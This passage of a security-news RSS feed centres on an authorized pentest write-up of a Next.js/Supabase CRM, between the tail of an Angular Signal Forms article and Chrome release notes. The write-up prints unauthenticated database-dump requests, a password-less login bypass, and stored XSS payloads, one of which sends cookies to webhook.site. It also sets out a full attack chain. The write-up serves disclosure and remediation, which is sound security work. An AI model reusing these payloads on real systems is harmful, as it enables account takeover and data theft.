<p>This template contains no subscriptions, no async pipes, and no event handlers for value changes. The UI simply reflects the current form state.</p>



<h3 class="wp-block-heading"><a></a>Interaction state and user experience</h3>



<p>One of the common criticisms of declarative form models is that they obscure user interaction logic. Signal Forms address this directly by exposing interaction metadata as signals.</p>



<p>The <code>touched()</code> signal determines whether a field has been interacted with. By combining it with <code>invalid()</code>, we control when validation messages appear. This logic remains purely declarative: the template describes when errors should be visible, and Angular ensures the signals stay up-to-date.</p>



<p>The disabled state of the submit button is derived from <code>registrationForm.invalid()</code>. There is no need to manually enable or disable it in response to events. If the form becomes valid, the button is enabled automatically.</p>



<h3 class="wp-block-heading"><a></a>Why this scales</h3>



<p>Even at this early stage, several advantages of a signal-first form model are apparent. The form’s behavior is expressed in terms of state and derivation, not events. The model, validation rules, and UI bindings are clearly separated. There is no duplication of logic between the component and the template.</p>



<p>As the form grows, this structure holds. Additional fields introduce additional schema entries and template bindings, not new subscription logic. Cross-field validation can be added declaratively. Asynchronous validation and persistence can be layered on without rewriting the core model.</p>



<p>Most importantly, the form remains inspectable. At any point during execution, the model signal reflects the current state of the form. Derived state validity, errors, and UI flags can be understood by reading the code, not by tracing runtime behavior.</p>



<h2 class="wp-block-heading"><a></a>What we did not solve yet (and why)</h2>



<p>At this stage, it would be easy to walk away with the impression that Signal Forms eliminates most of the hard problems associated with form handling. That impression would be misleading. What we have built so far is intentionally incomplete, not because the approach falls short, but because introducing too much too early obscures the value of the underlying model.</p>



<p>One area we have deliberately postponed is cross-field validation that expresses richer business rules. Many real-world forms depend on relationships between fields rather than isolated constraints. Password confirmation is a familiar example, but more complex scenarios quickly arise in enterprise applications. While Signal Forms support these patterns, introducing them before establishing a clear understanding of derived state risks turns validation back into an imperative exercise rather than a declarative one.</p>



<p>We have also avoided asynchronous validation. Server-backed checks introduce latency, partial failure, cancellation, and race conditions. These are not trivial concerns, and treating them casually often leads to subtle bugs and confusing user experiences. Although Signal Forms provide the necessary hooks to model asynchronous behavior, doing so responsibly requires a careful discussion of pending state, effects, and life-cycle boundaries. That discussion belongs in its own article.</p>



<p>Another omission is persistence and synchronization. Many forms need to autosave drafts, synchronize state with local storage, or react to changes by triggering external side effects. These behaviors are not part of the form state itself; they are consequences of state changes. Treating them as such is essential to keeping the architecture comprehensible. Introducing persistence too early would blur the distinction between state and reaction that this article has worked to establish.</p>



<p>Finally, this article has not addressed migration and interoperability. Few teams are starting from a blank slate. Most will adopt Signal Forms incrementally within applications that already rely on reactive forms or template-driven forms. Hybrid approaches, bridging strategies, and gradual refactors are all critical topics, but they presuppose familiarity with both paradigms. Addressing migration before establishing a solid signal-first mental model would undermine that foundation.</p>



<p>These omissions are intentional. A form architecture that tries to do everything at once often ends up doing nothing clearly. By focusing on the core ideas of state, derivation, and declarative validation, we create a base that can absorb additional complexity without collapsing under it.</p>



<h2 class="wp-block-heading"><a></a>Signal Forms in the context of Angular’s evolution</h2>



<p>To fully appreciate Signal Forms, it helps to step back and view them not as an isolated feature, but as part of a broader shift in Angular’s design philosophy.</p>



<p>For much of its history, Angular emphasized declarative templates paired with imperative coordination in component classes. RxJS became the backbone of that coordination, providing a powerful abstraction for handling asynchronous workflows, user input, and external events. This model scaled well, but it also encouraged developers to express state indirectly through streams and subscriptions.</p>



<p>Signals represent a deliberate recalibration. They re-center Angular’s reactivity model around state and derivation, rather than events and emissions. This shift is visible across the framework: in component inputs, change detection, and now forms. Signal Forms are not an attempt to replace everything that came before; they are an attempt to make the most common use case, modeling and deriving state, simpler and more explicit.</p>



<p>Framed this way, the design of Signal Forms aligns more closely with state-driven form behavior. The requirement to start with a model signal reflects the idea that the state should have a single, inspectable source of truth. Schema-based validation aligns with the notion that constraints are properties of state, not behaviors triggered by events. Field state exposed as signals reinforces the idea that validity, errors, and interaction metadata are derived values that should be read, not managed.</p>



<p>It is also worth noting that Signal Forms do <em>not</em> attempt to abstract away form behavior. They do not hide form state behind opaque classes or life-cycle hooks. They do not require developers to think in terms of control hierarchies or subscription graphs. Instead, they expose form behavior directly, making it easier to reason about how values, validation, and UI feedback relate to one another.</p>



<p>This approach aligns closely with other recent changes in Angular, including the introduction of modern template control flow and a stronger emphasis on explicit data dependencies. Together, these features point toward a framework that favors clarity over indirection and composition over orchestration.</p>



<p>Importantly, Signal Forms are still evolving. Their APIs may change, and their surface area will almost certainly expand. That is precisely why grounding them in first principles matters. Developers who understand <em>why</em> Signal Forms work the way they do will be far better equipped to adapt as the APIs mature.</p>



<p>This article has intentionally avoided duplicating documentation or enumerating every available feature. Instead, it has focused on establishing a conceptual framework that makes the official APIs feel intuitive rather than surprising. When viewed this way, Signal Forms are not a new way to write forms; they are a clearer expression of what forms have always been.</p>



<h2 class="wp-block-heading"><a></a>A new way to think about forms</h2>



<p>Building the registration form in this article reveals a quiet but important shift. The reduction in complexity does not come from fewer features or simpler requirements. It comes from expressing form behavior in terms of state and derivation rather than orchestration and reaction.</p>



<p>By treating the data model as the single source of truth, validation rules as declarative constraints, and UI behavior as derived from current conditions, much of the coordination logic that typically surrounds forms becomes unnecessary. There are fewer subscriptions to manage, fewer flags to synchronize, and fewer life-cycle concerns to reason about. Form behavior becomes easier to inspect because it is visible directly in the relationships between values.</p>



<p>This approach does not eliminate the hard problems associated with forms. Asynchronous validation, persistence, and interoperability with existing Angular Forms APIs still require careful design. What changes is where that complexity lives. Instead of being interwoven with state representation, those concerns are layered explicitly on top of a clear foundation.</p>



<p>Signal-first forms are not a universal replacement for existing patterns, nor are they a shortcut to simpler applications. They are, however, a strong example of how aligning APIs with first principles can reduce cognitive overhead and improve maintainability over time. For teams building large, state-heavy forms, this alignment can make the difference between code that merely works and code that continues to evolve without friction.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Pentested a Real CRM System and Found 4 Critical Vulnerabilities — Here’s the Full Attack Chain]]></title>
<description><![CDATA[Author: Shikhali JamalzadeGitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzadsDisclosure Notice: This assessment was conducted with explicit written authorization from the organization’s CEO and senior leadership. All sensitive details — including the target domain, company name, Supa...]]></description>
<link>https://tsecurity.de/de/3606858/hacking/i-pentested-a-real-crm-system-and-found-4-critical-vulnerabilities-heres-the-full-attack-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606858/hacking/i-pentested-a-real-crm-system-and-found-4-critical-vulnerabilities-heres-the-full-attack-chain/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:22 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kIqGy9rC6ealvMq7E-VNtg.png"></figure><h4><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br><strong>GitHub:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="https://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a></h4><blockquote><strong><em>Disclosure Notice:</em></strong><em> This assessment was conducted with explicit written authorization from the organization’s CEO and senior leadership. All sensitive details — including the target domain, company name, Supabase project identifiers, API keys, credentials, user email addresses, and personal data — have been redacted or anonymized in this write-up. No sensitive information was retained after reporting. This write-up is published strictly for educational purposes.</em></blockquote><h3>Background</h3><p>A few weeks ago, my instructor handed me a task: <em>“Pentest our internal CRM platform. You have full authorization — everything except DDoS.”</em></p><p>It was a real, live production system. A Next.js application backed by Supabase/PostgreSQL, used by instructors, support staff, and admins to manage students, leads, payments, and internal communications. Real people. Real data.</p><p>I expected maybe one or two interesting findings. What I found instead was a complete, unobstructed path from zero knowledge to full database dump — without ever needing a username or password. And by the time I got deep enough into the database, I realized I wasn’t the first person to find this.</p><p>This is the story of that assessment.</p><h3>Scope &amp; Rules of Engagement</h3><p><strong>Target:</strong> Internal CRM web application (production) <strong>Stack:</strong> Next.js (SSR), Supabase/PostgreSQL, nginx <strong>Assessment Type:</strong> Black-Box Web Application Penetration Test <strong>Authorization:</strong> CEO + Senior Instructors (written) <strong>Exclusions:</strong> DDoS / Denial of Service <strong>Tools:</strong> Burp Suite Pro, Nmap, ffuf, feroxbuster, subfinder, whatweb, curl</p><h3>Phase 1: Reconnaissance</h3><p>I started the way I always do — passive recon, then active enumeration.</p><pre># Port scan<br>nmap -sC -sV -oN nmap/target.txt &lt;TARGET_IP&gt;</pre><pre># Subdomain enumeration<br>subfinder -d &lt;TARGET_DOMAIN&gt; -o subdomains.txt</pre><pre># Technology fingerprinting<br>whatweb https://&lt;TARGET_DOMAIN&gt;</pre><p><strong>Nmap results:</strong></p><pre>22/tcp  open  ssh     OpenSSH (Ubuntu)<br>80/tcp  open  http    nginx/1.24.0 (Ubuntu) → redirect to HTTPS<br>443/tcp open  https   nginx/1.24.0</pre><p>Whatweb and browser analysis confirmed:</p><ul><li><strong>Framework:</strong> Next.js (SSR) — Build ID visible in page source</li><li><strong>Server:</strong> nginx/1.24.0 on Ubuntu Linux</li><li><strong>Auth UI:</strong> Custom login form at /[locale]/login</li></ul><p>Nothing immediately exploitable. Time to dig deeper.</p><h3>Phase 2: Mapping the Attack Surface</h3><h3>Directory &amp; API Endpoint Discovery</h3><pre>feroxbuster -u https://&lt;TARGET&gt; -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \<br>  -x js,json,php -mc 200,301,302,401,403,405</pre><p>Interesting endpoints discovered:</p><pre>/api/health          → 200 OK<br>/api/tickets         → 200 OK   ← wait, what?<br>/api/search?q=*      → 200 OK<br>/api/dashboard       → 200 OK<br>/api/broadcast       → 421 Misdirected Request</pre><p>I stared at /api/tickets for a second. This endpoint had no authentication requirement visible from the URL. I fired a raw curl at it without any session cookie or token:</p><pre>curl -s https://&lt;TARGET&gt;/api/tickets</pre><p>The response came back instantly: a full JSON array of ticket records. Names, descriptions, internal notes. No token. No session. Nothing.</p><p>That’s when I knew this was going to be a serious engagement.</p><h3>Next.js Bundle Analysis</h3><p>Next.js bundles its routing and configuration into static JavaScript files served to all visitors. I pulled the build manifest:</p><pre>/_next/static/&lt;BUILD_ID&gt;/_buildManifest.js</pre><p>Inside the bundles, I found references to multiple internal routes, API paths, and — more importantly — environment variables that had leaked into the client-side JavaScript. One of them was a Supabase configuration block.</p><h3>Phase 3: Vulnerability Identification &amp; Exploitation</h3><h3>V-01 — Broken Access Control: Unauthenticated API Access [CRITICAL | CVSS 9.8]</h3><p><strong>CWE-284 — Improper Access Control</strong></p><p>Multiple API endpoints returned full JSON data with no authentication whatsoever. I tested each one with zero credentials:</p><pre># All of these returned HTTP 200 with full data — no token, no cookie, nothing<br>curl https://&lt;TARGET&gt;/api/tickets<br>curl https://&lt;TARGET&gt;/api/search?q=*<br>curl https://&lt;TARGET&gt;/api/dashboard<br>curl https://&lt;TARGET&gt;/api/health</pre><p>The /api/dashboard endpoint returned aggregated business metrics — student counts, revenue summaries, lead pipeline data — all publicly accessible.</p><p>The /api/health endpoint returned the Node.js runtime version and server uptime. Minor on its own, but useful for a targeted attacker.</p><p><strong>Impact:</strong> Complete confidentiality breach of all application data without any prior access.</p><h3>V-02 — Exposed Supabase Anon API Key in Client-Side JavaScript [CRITICAL | CVSS 9.1]</h3><p><strong>CWE-522 — Insufficiently Protected Credentials</strong></p><p>This was the finding that opened everything else.</p><p>While analyzing intercepted requests in Burp Suite, I noticed the browser was making direct calls to a *.supabase.co subdomain. The requests included an apikey header — and that key was coming directly from the JavaScript bundle served to any visitor.</p><pre>Host: [REDACTED].supabase.co<br>apikey: [REDACTED — JWT token with role: "anon", expiry: year 2091]<br>Authorization: Bearer [SAME REDACTED KEY]</pre><p>The key had a <strong>year 2091 expiry</strong>. Effectively permanent.</p><p>Supabase exposes a PostgREST API — an HTTP interface that maps directly to PostgreSQL tables. With this key and no Row Level Security (RLS) policies enabled, I had direct read access to the entire database. No authentication. No privilege escalation. Just a key that was sitting in the JavaScript any visitor could download.</p><pre># Direct Supabase PostgREST queries — all returned HTTP 200<br>GET /rest/v1/users?select=*            → 38 user records (including plaintext passwords)<br>GET /rest/v1/leads?select=*            → 39 lead records (names, emails, phone numbers, deal values)<br>GET /rest/v1/payments?select=*         → 31 payment and invoice records<br>GET /rest/v1/courses?select=*          → Course catalog with pricing and instructor assignments<br>GET /rest/v1/instructor_notes?select=* → 29 private instructor notes<br>GET /rest/v1/chats?select=*            → Internal chat messages<br>GET /rest/v1/schedule_events?select=*  → 30 schedule entries<br>GET /rest/v1/automations?select=*      → Business automation rules and triggers</pre><p>I had just dumped the entire database from the browser.</p><p><strong>The root cause:</strong> The Supabase anon key was embedded in the client-side JavaScript bundle and all Supabase tables had Row Level Security disabled — meaning the anon role had unrestricted read access to every table.</p><p><strong>Impact:</strong> Complete, unauthenticated exfiltration of all user data, financial records, PII, internal communications, and business logic.</p><p><strong>What should have happened:</strong></p><ul><li>The anon key should never appear in client-side code</li><li>All Supabase tables must have RLS policies enabled</li><li>API keys must live in server-side environment variables only, acting as a proxy layer</li></ul><h3>V-03 — Plaintext Password Storage [CRITICAL | CVSS 9.0]</h3><p><strong>CWE-256 — Plaintext Storage of a Password</strong></p><p>When I queried the users table, the response included a password field. Not a hash. Not a bcrypt output. The actual plaintext password for every single account.</p><pre>{<br>  "email": "[REDACTED]@[REDACTED].edu.az",<br>  "role": "SUPER_ADMIN",<br>  "password": "[REDACTED]"<br>}</pre><p>38 user records. All roles. All passwords. Visible, readable, immediately usable.</p><p>I won’t detail the specific credentials here — they have since been reported and the organization has been notified. But the breakdown included SUPER_ADMIN, INSTRUCTOR, SUPPORT, and STUDENT roles — the entire user hierarchy.</p><p><strong>The cascading impact of this finding:</strong> Because passwords were plaintext, anyone who accessed the database (via V-02 or any future breach) immediately has working credentials for every account. No cracking. No GPU farms. Just copy-paste.</p><p>Additionally, if any user reuses these passwords on external services — email, banking, other platforms — those are now exposed too.</p><p><strong>What should have happened:</strong></p><ul><li>Passwords must be hashed using bcrypt (cost ≥ 12), scrypt, or Argon2id before storage</li><li>The password field must never be returned in any API response — not even to admins</li><li>Supabase Auth (GoTrue) handles this by default; custom auth flows should never store plaintext</li></ul><h3>V-04 — Authentication Bypass: Optional Password Field [CRITICAL | CVSS 9.8]</h3><p><strong>CWE-287 — Improper Authentication</strong></p><p>At this point I had all user emails from the database. But I wanted to test whether I actually needed the passwords at all.</p><p>I logged into Burp Suite Repeater, captured a normal login request, and removed the password field entirely:</p><pre>POST /api/login HTTP/2<br>Host: [REDACTED]<br>Content-Type: application/json</pre><pre>{"email": "[REDACTED_ADMIN_EMAIL]"}</pre><p>The server accepted it.</p><p>No password. No error. The application processed the request as a valid authentication attempt.</p><p><strong>Why this happens:</strong> The login handler likely performs a database lookup by email and, if no password is provided, the comparison logic returns true or null (falsy check passes) rather than throwing a validation error. A single missing server-side check — if (!password) return 400 — would have prevented this entirely.</p><p><strong>Combined impact with V-01 and V-02:</strong> An attacker can enumerate all user emails from the unauthenticated API, then bypass authentication for any account using just the email address. No password knowledge required at any step.</p><p><strong>What should have happened:</strong></p><ul><li>Enforce strict schema validation (Zod or Joi) at the API handler level</li><li>Both email and password must be present, non-null, and non-empty before any database query executes</li><li>Return HTTP 400 with a generic error message for any missing authentication field</li></ul><h3>V-05 — Stored Cross-Site Scripting: Multiple Endpoints [HIGH | CVSS 8.2]</h3><p><strong>CWE-79 — Improper Neutralization of Input During Web Page Generation</strong></p><p>While reading through the database dump, I noticed something unusual in the instructor_notes and tickets tables. Some records had values that looked distinctly non-standard:</p><pre>tickets.title: "&gt; &lt;script&gt;alert('XSS')&lt;/script&gt;<br>tickets.title: &lt;img src=x onerror="alert('XSS_SUCCESS_DASHBOARD')"&gt;</pre><pre>leads.full_name: &lt;script&gt;fetch('https://webhook.site/[REDACTED]<br>                 ?sessiya=' + btoa(document.cookie))&lt;/script&gt;</pre><pre>instructor_notes.author: &lt;details open ontoggle=alert(1)&gt; Administrator<br>instructor_notes.content: &lt;img src=x onerror="alert('Sizin sessiyanız oğurlandı: '<br>                           + document.cookie)"&gt;</pre><pre>chats.content: "&gt; &lt;script&gt;alert('XSS')&lt;/script&gt;</pre><p>Stored XSS payloads — across four different tables. And the webhook payload in leads.full_name was actively sending base64-encoded cookie data to an external server.</p><p>I confirmed the application renders these fields without sanitization. Any authenticated user who views the Leads, Tickets, or Instructor Notes sections would execute these scripts in their browser.</p><p>The document.cookie exfiltration payload via fetch() to webhook.site means that an attacker who plants this payload in a lead record waits for an admin to open the leads page — and receives their session token automatically.</p><p><strong>What should have happened:</strong></p><ul><li>All user-supplied input must be sanitized server-side before database writes</li><li>Output must be encoded at render time — React’s default JSX escaping prevents this, but dangerouslySetInnerHTML bypasses it</li><li>A strict Content Security Policy (CSP) header blocks inline scripts and restricts fetch() destinations</li><li>Existing payload records must be purged from the database</li></ul><h3>V-06 — CORS Misconfiguration: Wildcard Origin [HIGH | CVSS 7.5]</h3><p><strong>CWE-942 — Permissive Cross-Origin Resource Sharing Policy</strong></p><p>The OPTIONS preflight response from every API endpoint returned:</p><pre>Access-Control-Allow-Origin: *<br>Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS<br>Access-Control-Allow-Headers: Content-Type, Authorization</pre><p>A wildcard Access-Control-Allow-Origin means any website on the internet can make JavaScript-initiated cross-origin requests to these endpoints and read the full responses.</p><p>Combined with V-01 (unauthenticated API access), this means a malicious website could silently harvest all CRM data from any visitor’s browser — without any user interaction other than visiting the page.</p><p><strong>What should have happened:</strong></p><ul><li>Replace * with an explicit origin allowlist</li><li>Restrict allowed methods to what each endpoint actually needs</li><li>Use Next.js middleware for CORS enforcement rather than relying solely on nginx headers</li></ul><h3>V-07 — Business Logic Flaw: Negative Payment Amounts [MEDIUM | CVSS 6.5]</h3><p><strong>CWE-840 — Business Logic Errors</strong></p><p>In the payments table, I found records with negative monetary values:</p><pre>student: [REDACTED] | amount: -99999 | invoice: INV-TEST-99999 | status: paid<br>student: [REDACTED] | amount: -3000  | invoice: HACK-999-001   | status: paid</pre><p>The invoice ID HACK-999-001 is particularly notable — it suggests this was not an accidental entry.</p><p>The API accepted these values without any server-side validation. If the application processes negative amounts as refunds or credits, an attacker could manipulate financial records or corrupt reporting.</p><p><strong>What should have happened:</strong></p><ul><li>Server-side validation rejecting any payment amount ≤ 0</li><li>Database-level constraint: CHECK (amount &gt; 0) on the payments table</li><li>Investigation and cleanup of anomalous records</li></ul><h3>V-08 — Information Disclosure: Stack &amp; Schema Details [LOW | CVSS 4.3]</h3><p><strong>CWE-200 — Exposure of Sensitive Information</strong></p><p>Several endpoints leaked technical implementation details:</p><pre>GET /api/health<br># Returns: {"status":"healthy","node_version":"v24.15.0","uptime":1.019}</pre><pre>GET /rest/v1/instructors<br># Returns: PGRST205 hint: 'Perhaps you meant public.instructor_notes'</pre><pre>GET /rest/v1/schedules<br># Returns: PGRST205 hint: 'Perhaps you meant public.schedule_events'</pre><p>The PostgREST error hints are essentially a free schema enumeration tool — they reveal exact database table names when you guess wrong. The Next.js Build ID was also embedded in every page response, enabling precise version correlation.</p><p>Low severity on its own, but useful context for a targeted attacker combining it with higher-severity findings.</p><h3>A Disturbing Discovery: Evidence of Prior Exploitation</h3><p>The most unsettling moment of the entire assessment came from reading the database carefully.</p><p>Stored inside production records — tickets, payments — were payloads that were clearly not part of the application’s legitimate data:</p><ul><li><strong>A PostgreSQL RCE attempt:</strong> COPY FROM PROGRAM syntax stored in a ticket record, suggesting at least one external actor attempted server-side command execution through the database</li><li><strong>A Go template injection payload:</strong> {{range .}}{{end}}{{template "exploit" .}} — stored in another ticket, probing for server-side template injection</li><li><strong>XSS payloads actively sending data to webhook.site</strong> — confirming that at least one external party had already planted exfiltration scripts and was receiving session cookies</li><li><strong>A Burp Suite Collaborator (oastify.com) OAST payload</strong> in the payments table — indicating active out-of-band testing by an external party</li></ul><p>This wasn’t a theoretical attack surface. Someone had already found these vulnerabilities, and they were actively using them.</p><h3>The Complete Attack Chain</h3><pre>[Attacker — No credentials, no prior knowledge]<br>        │<br>        ▼<br>[1] Passive recon → identify Next.js + Supabase stack from JS bundles<br>        │<br>        ▼<br>[2] feroxbuster → discover /api/tickets, /api/search, /api/dashboard<br>        │<br>        ▼<br>[3] curl /api/tickets (no auth) → 200 OK → V-01 confirmed<br>        │<br>        ▼<br>[4] Burp Suite intercept → extract Supabase URL + anon key from headers<br>        │<br>        ▼<br>[5] GET /rest/v1/users?select=* → 38 users, plaintext passwords, all roles<br>    GET /rest/v1/leads?select=*  → 39 lead records with PII<br>    GET /rest/v1/payments?select=* → 31 payment records<br>    ... (complete database dump — V-02, V-03)<br>        │<br>        ▼<br>[6] POST /api/login {"email": "[ANY_ADMIN_EMAIL]"} (no password) → auth bypass<br>    → SUPER_ADMIN session obtained — V-04<br>        │<br>        ▼<br>[7] Authenticated access → inject XSS payload in leads/tickets/notes<br>    → Any admin who views the record executes the payload<br>    → Session cookie exfiltrated to attacker webhook — V-05<br>        │<br>        ▼<br>[8] Full account takeover — all SUPER_ADMIN, INSTRUCTOR, SUPPORT accounts<br>    accessible. All data readable, modifiable, deletable.</pre><pre>TOTAL TIME FROM ZERO TO FULL COMPROMISE: &lt; 30 minutes</pre><h3>Remediation Roadmap</h3><p><strong>Immediate — 24 hours</strong></p><p><strong>1 · V-02 · Exposed Supabase Anon Key</strong> Rotate the Supabase anon key immediately. Enable Row Level Security on every table. Move all API keys to server-side environment variables — never in client-side JavaScript bundles.</p><p><strong>2 · V-03 · Plaintext Password Storage</strong> Hash all stored passwords using bcrypt (cost ≥ 12) or Argon2id. Force a password reset for every account. The password field must never be returned in any API response.</p><p><strong>Urgent — 72 hours</strong></p><p><strong>3 · V-01 · Unauthenticated API Access</strong> Add authentication middleware to all /api/* routes. No endpoint that returns user data should be reachable without a valid session.</p><p><strong>4 · V-04 · Authentication Bypass</strong> Enforce mandatory validation of both email and password fields at the API handler level before any database query runs. Return HTTP 400 for any missing field.</p><p><strong>High — 1 week</strong></p><p><strong>5 · V-05 · Stored XSS</strong> Sanitize all user-supplied input server-side before database writes. Implement a strict Content Security Policy header. Purge all existing XSS payload records from the database.</p><p><strong>6 · V-06 · CORS Wildcard</strong> Replace Access-Control-Allow-Origin: * with an explicit origin allowlist. Restrict allowed methods per endpoint.</p><p><strong>Medium / Low</strong></p><p><strong>7 · V-07 · Negative Payment Amounts</strong> <em>(2 weeks)</em> Validate amount &gt; 0 at the API handler level and enforce a CHECK (amount &gt; 0) constraint at the database layer.</p><p><strong>8 · V-08 · Information Disclosure</strong> <em>(1 month)</em> Restrict /api/health to internal access only. Suppress verbose PostgREST error hints in all client-facing responses.</p><h3>Key Takeaways for Developers</h3><p>The vulnerabilities found here are not exotic or theoretical. They are some of the most common and preventable mistakes in modern web application development.</p><p><strong>1. Never put secrets in client-side JavaScript.</strong> A Supabase anon key in your JavaScript bundle is a key handed to every visitor. Treat your frontend code as fully public. All API keys belong in server-side environment variables, proxied through server-side routes.</p><p><strong>2. Supabase RLS is not optional.</strong> Supabase’s Row Level Security exists precisely because the PostgREST API is designed to be called from the client. Without RLS policies, your anon key grants read access to every row in every table. Enable RLS. Add explicit policies. Deny by default.</p><p><strong>3. Validate authentication inputs on the server.</strong> Never trust that a request body contains what it should. If password is missing, return 400 immediately. Use Zod or Joi to enforce input schemas at the API handler level before any database query runs.</p><p><strong>4. Never store plaintext passwords.</strong> This should go without saying in 2026, but here we are. Use bcrypt, scrypt, or Argon2id. Never compare plaintext. Never return the password field in any API response — not even to authenticated admins.</p><p><strong>5. Sanitize all inputs, encode all outputs.</strong> If user-supplied data is rendered in a browser, it must be sanitized before storage and encoded at render time. React’s default JSX escaping helps — but only if you don’t bypass it with dangerouslySetInnerHTML.</p><p><strong>6. Monitor your own database for signs of compromise.</strong> The presence of PostgreSQL RCE attempts, template injection payloads, and active cookie-stealing XSS scripts in production data is a strong indicator of prior exploitation. Regular database audits and anomaly detection would have surfaced these earlier.</p><h3>Responsible Disclosure Timeline</h3><p><strong>April 25, 2026</strong> — Assessment conducted with full authorization <strong>April 25, 2026</strong> — Full technical report delivered to MilliSec leadership <strong>April 25, 2026</strong> — Organization notified of critical findings requiring immediate action <strong>May 2026</strong> — Write-up published after internal review and redaction</p><h3>Final Thoughts</h3><p>This was one of the most eye-opening assessments I’ve done. Not because of technical complexity — none of these vulnerabilities required advanced exploitation. The hardest part was writing a GET request with curl.</p><p>What made it sobering was the evidence that other actors had already found the same path. The database had traces of PostgreSQL RCE attempts, active XSS exfiltration, and Burp Collaborator callbacks — left by people who found this before I did and may have been quietly exfiltrating data.</p><p>The good news: every single one of these vulnerabilities is fixable. Most of them within hours. The patch for V-04 is literally one if statement. The patch for V-02 is moving a string from a .js file to a .env.local file. The barrier to fixing these is low. The cost of not fixing them is everything.</p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><p><em>All testing was conducted on an authorized target with full written permission. Never test systems you don’t own or have explicit authorization to test.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=98c030a57ab1" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-pentested-a-real-crm-system-and-found-4-critical-vulnerabilities-heres-the-full-attack-chain-98c030a57ab1">I Pentested a Real CRM System and Found 4 Critical Vulnerabilities — Here’s the Full Attack Chain</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[ Hello Everyone! We've just released Chrome 150 (150.0.7871.28) for Android to a small percentage of users. It'll become available on Google Play over the next few days. You can find more details about early Stable releases here.This release includes stability and performance improvements. You ca...]]></description>
<link>https://tsecurity.de/de/3606237/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606237/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Wed, 17 Jun 2026 23:53:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p> Hello Everyone! We've just released Chrome 150 (150.0.7871.28) for Android to a small percentage of users. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. You can find more details about early Stable releases <a href="https://developer.chrome.com/blog/early-stable/">here</a>.</p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.159..150.0.7871.28?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.<br><br>Harry Souders<br><a href="https://www.google.com/chrome/">Google Chrome</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Stable for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Stable 150 (150.0.7871.34) for iOS; it'll become available on App Store in the next few hours.This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know by...]]></description>
<link>https://tsecurity.de/de/3606236/it-security-nachrichten/chrome-stable-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606236/it-security-nachrichten/chrome-stable-for-ios-update/</guid>
<pubDate>Wed, 17 Jun 2026 23:53:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Stable 150 (150.0.7871.34) for iOS; it'll become available on App Store in the next few hours.</p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.137..150.0.7871.34?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 150 (150.0.7871.35) for iOS; it'll become available on App Store in the next few days.You can see a partial list of the changes in the Git log. If you find a new issue, please let us know by filing a bug.Chrome Release TeamGoogle Chrome]]></description>
<link>https://tsecurity.de/de/3605846/it-security-nachrichten/chrome-beta-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605846/it-security-nachrichten/chrome-beta-for-ios-update/</guid>
<pubDate>Wed, 17 Jun 2026 20:52:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 150 (150.0.7871.35) for iOS; it'll become available on App Store in the next few days.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.14..150.0.7871.35?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 150 (150.0.7871.28) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new...]]></description>
